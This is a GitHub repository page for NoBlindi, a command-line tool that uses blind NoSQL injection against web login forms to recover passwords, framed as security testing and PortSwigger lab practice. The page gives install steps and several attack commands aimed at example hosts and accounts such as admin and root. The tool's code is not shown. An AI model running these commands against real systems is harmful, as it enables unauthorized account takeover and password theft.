Skip to content

YasserREED/NoBlindi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

NoBlindi

This tool is designed for testing the security of NoSQL databases in web applications. It focuses on identifying and exploiting blind NoSQL injection vulnerabilities to recover passwords. It's a command-line tool, making it easy to integrate into various testing workflows.

Features:

  • Blind NoSQL Injection for Password Recovery
  • Customizable Parameters for Targeted Attacks
  • Simple Command-Line Interface
  • Cross-Platform Compatibility and Support

Installation

Copy this Link

sudo git clone https://github.com/YasserREED/NoBlindi.git

Enter The File

cd NoBlindi/

Download requirement library

pip install -r requirements.txt

Open the tool by python3

python3 NoBlindi.py -h

NoBlindi Help Guide

python3 NoBlindi.py -h
python3 NoBlindi.py -u https://example.com/login -uf 'username' -pf password -rn 'admin' -b '{"username":"", "password":""}' -sc 200 -f "Invalid credentials"
python3 NoBlindi.py -u https://example.com/login -uf 'user' -un 'admin' -pf 'pass' -b '{"user":"", "pass":"", "redirect":"/dashboard", "security_question":"", "security_answer":""}' -sc 302 --redirect -sh "Authorization" -f "Login failed"
python3 NoBlindi.py -u https://examplecorp.com/admin -uf 'login' -pf password -un 'superadmin' -b '{"login":"", "password":"start123!", "last_active_timestamp":"", "login_count":"", "account_status":"active"}' -sc 200 -f "Access Denied"
python3 NoBlindi.py -u https://internalsite.example.org/login -uf 'username' -un 'root' -b '{"username":"", "password":"", "otp_code":"", "session_expiry":"1hr", "browser_info":"Mozilla/5.0"}' -sc 200 - "*+.?|{}[]"
python3 NoBlindi.py -u https://api.example.com/v1/authenticate -uf 'email' -un 'johndoe@example.com' -pf 'pwd' -b '{"email":"", "pwd":"", "api_key":"", "request_time":"2023-03-15T12:00:00Z", "client_version":"1.2.3"}' -sc 200 -sh "JWT-Token" -f "Unauthorized

Usage

Simple example:

python3 NoBlindi.py -u https://www.attacker.com/login -uf 'username' -pf password --username 'admin' -b '{"username":"", "password":""}'

Make custom condition to check will status code 200 and login failed message:

python3 NoBlindi.py -u https://www.attacker.com/login -uf 'username' -pf password --username 'admin' -b '{"username":"", "password":""}' -success_code 200 -f "Invalid username or password"

Portswigger Lab

1- Access the Lab: https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-bypass-authentication

2- Use this command to solve the protswigger lab and retrieve the admin password:

python3 NoBlindi.py -u https://0a7a0055033f04f080539ef200bc00b5.web-security-academy.net/login  -uf 'username' -pf password -rn 'admin' -b '{"username":"", "password":""}' -sc 302 -rn 'admin' -r

When we run the command:

image

After the tool is finished:

image


Enjoy! ❤️‍🔥

About

NoBlindi is a command-line tool for exploiting blind NoSQL injection vulnerabilities to recover passwords in web applications.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages